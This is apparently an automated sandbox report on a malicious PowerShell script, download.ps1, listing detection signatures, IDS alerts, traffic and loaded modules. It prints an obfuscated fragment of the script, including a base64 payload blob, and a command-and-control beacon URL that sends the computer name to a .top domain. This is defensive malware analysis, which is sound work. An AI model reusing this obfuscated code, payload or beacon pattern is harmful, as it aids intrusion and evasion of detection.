Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579001
MD5:506d528176abebda1202676b0528e974
SHA1:58036f821fad918c508ed11270e2df7474b3a2e3
SHA256:bd7cd2b13af4f8065d7970d6a6c0163ce4e155c60ae7a67062e4e17c439b1f95
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 5908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5908, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5908, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-20T17:41:13.852263+010020283713Unknown Traffic192.168.11.304984523.50.114.17443TCP
2024-12-20T17:42:17.415778+010020283713Unknown Traffic192.168.11.304985323.50.114.17443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-20T17:41:14.563032+010028593911Domain Observed Used for C2 Detected192.168.11.30584091.1.1.153UDP

Click to jump to signature section

Show All Signature Results
Source: Binary string: softy.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643068475958.000001A73D8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdbdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: powershell.exe, 00000001.00000002.643108718460.000001A755E51000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.30:58409 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49845 -> 23.50.114.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49853 -> 23.50.114.17:443
Source: global trafficHTTP traffic detected: GET /kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EF06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527p
Source: powershell.exe, 00000001.00000002.643068475958.000001A73D91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000001.00000002.643068475958.000001A73D91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
Source: powershell.exe, 00000001.00000002.643109343926.000001A7560EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzS
Source: powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic8
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzS
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8Z
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcK
Source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzS
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B088C921_2_00007FFA7B088C92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B087EE61_2_00007FFA7B087EE6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B07C7DA1_2_00007FFA7B07C7DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B080E1D1_2_00007FFA7B080E1D
Source: classification engineClassification label: mal64.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_250tzhle.5fo.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $86zuy3xghtrqwve.(([char[]]@((-8759+(12159-3333)),(1082583/(10676-923)),(-1256+1368),(-4028+(-1825+(15221752/2548))),(9559-9475),(5516-(5445-(-610+(-4271+4921))))) -join ''))( $pt7afszmng9hol5 ) $86zuy3xghtrqwve.((-join (@((354296/5288),(-3056+3164),(571761/5151),(-10032+10147),(4537-4436))| ForEach-Object { [char]$_ })))()$eni4vzuxs2d5yoa.(([char[]]@((658208/(13365-3541)),(-9358+(10414-948)),(633699/(22875963/(30549368/7624))),(742670/6458),(-7430+7531)) -join ''))()[byte[]] $bxrc2jni4slugvt = $pt7afszmng9hol5.(([system.String]::new(@((981-897),(4326-4215),(-5367+(7729736/(-8618+(12028-(487+1500))))),(-4969+5083),(8315-(1920+6281)),(-5956+(11228-(45384750/8770))),(-6445+6566)))))() $cs3pj58qgiuek20=$bxrc2jni4slugvt return $cs3pj58qgiuek20}[System.Text.Encoding]::ascii.(([system.String]::new(@((304022/4282),(324008/(12915408/4026)),(898884/(13560750/1750)),(411182/4954),(7058-(493+6449)),(2257-(-3233+(9152-(12961-9185)))),(39900/(6930-(14782-(68506704/(9823-(1812-311)))))),(-8266+(5951+2425)),(2783-(19467520/7264))))))((nghl3ewmdia0bvsr1z6kjfo9x5q "Kb44enhqZjlvd8TybbolLQ6t+VqiqIimFAaXKSu+2GbnJ0sjBEz69uwTrroOMum1MEZZVPVbkMHQkJ4xnTtEuWhKLCWypxQg45uNrYI1sGNeKBefk8hDmf8tcU6ES5OUyIbD/fc1uYcaiZqXi6KndVb0uoITBRCQxdCdYUfV2EGdj4Dl2dvMgquXvf4USNYyydbZZVd0WUQSDpeSmaJHVCfUXoISyxf3rfJflKXVlcXwGNaTodZB3EK8BbJaWVD6QkPG/RuBX5SsJTIgH5Gd92GfhQ0IWQBVmBzHzmQJ+QidZ5Eve4DA+UooOrZSoNhy4Qf3JgKDhfWUmGapLA+n18uMoq4ZvDiRu1zEw7Y71UYBukrpE/rsgzPk94YFTuXCidDirJsCy5Xeswe5+gZBgWmfqytgvDE9rXSbk0XF+7KyEjplE/Hd4grBE82q+o7CQ7gRouWTIvby0PfPmQlrmnE98OP8FCLbgWlJiOq4OtsHjp0m3TkBVUvMCkaCQkayX8ff5j40lNE2aFXCCWsMAgqSm9ZS/QYwiktBA4aSgGZE6FYWxPaHJQeXgsW+5hoGB7mSH91yNNkkXu2Gwb2KPbKzqJnaFjPnwEddw83PqWAXQlTc0cleiJfyDPFXNgWYjSuFVyNBG9NZDoOKwirN90vD82LsrWux7H/TKY7bNl+xlXWYh/uWid14zBZAn7kdW1YdwzY1J1oqsHUUartNLK6yIRlR1dfYqUWdVxU/LQdQja+eyrJTE/siRqMZuAznF2MLG3rj1ZFKHWAF0md7FjEV74iDiyPeCbIJOaEMqXQk7A4yTd/lxbuUo6+ezlOVbLbOTgtIBo4qb4Mtm9zwc3Z8qBDss47ZrCFVDIEysNrHysXNzI+Ed85xEOQ6T9TeuwVEsSCxMhvn33bIKrZtHrSq/9x3UKZdW/Z2kg3c6xqP75cYzub1iQfRFdaVjf7VCavvwUSWHIkvip+oSSpOGWU1GMiJouqlTcK/TVb12QVUjJylGcvRrROTGWGk6HQASkrXq/OZuTfUqRGXxuuD8a+hi/qavwB9gal4nLb3Nh8OfgRsvvL+PhTlAxNpDUzr1Xms50Y8TPYs2wUpZpVFGOt3/USkntrr9ZkNUxZZ+WVGmvpraSosOuOc12LszKah2QmMD4CHZXK9hNXd1Kdj99sY2yfwJdvbd3s7BRrd0xKoYukqsrd34yfZmOUykAVUu2l+UaXkewmJRc0XAaXSUfwLDabZN7tdQwMXDqhaq4qe37LtABzWvlYCC+XTcZlnrv6yMn/UEadBAbtcptTcI/b//iNyj3RHtvbwKfRJF7ReLrl5VOYntY4MqHtwKhptGq5AzXACXoC786Lqxf2KRRg2rJWVl0X7CiysEHPTkXP5x/4P4EB08ZY/r+p8YfWw6z/Ohb75Md4kaHk8wWrsBwGRDj2YKOZx2jRKAu8yuN2Yxv5+vrVZU7ApMLdB0TA4dZM+Iv6L3nLd22NxpKxvYjrepyBidzoEc2Qo2/B3rxqszHtjjAUAQoy3snp2fSsOlbmYWlFHw1xPqG8ThCMRIUquzUobuHB1sYRBBTsi5D7vS8+vl2OCxfAfanlN921ILf2zflg6rPrVtchrKzy0eUNDlBoLvVpsArUvlq2TfQA1N8M46UVRtgvECv6XH78x6+ZFjl1ku6CMOymiPtFUVzzQW7udboFJU8cqWxEpfsHJGqq4jWOd6+UkkK5Se6lVSu/rSvSItsGe4eJ/GDpjP09aw0YWNQR+o1jRmgST4ogN81jucN1YXdq2LvR5JeigIkU0U89gS7Te5vPQP0VpqpH7qUqg/azh2vAlpwp6ZzDZto3XRsJRoUJ/ECIQkwkhquBeXcb4ZURCup
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
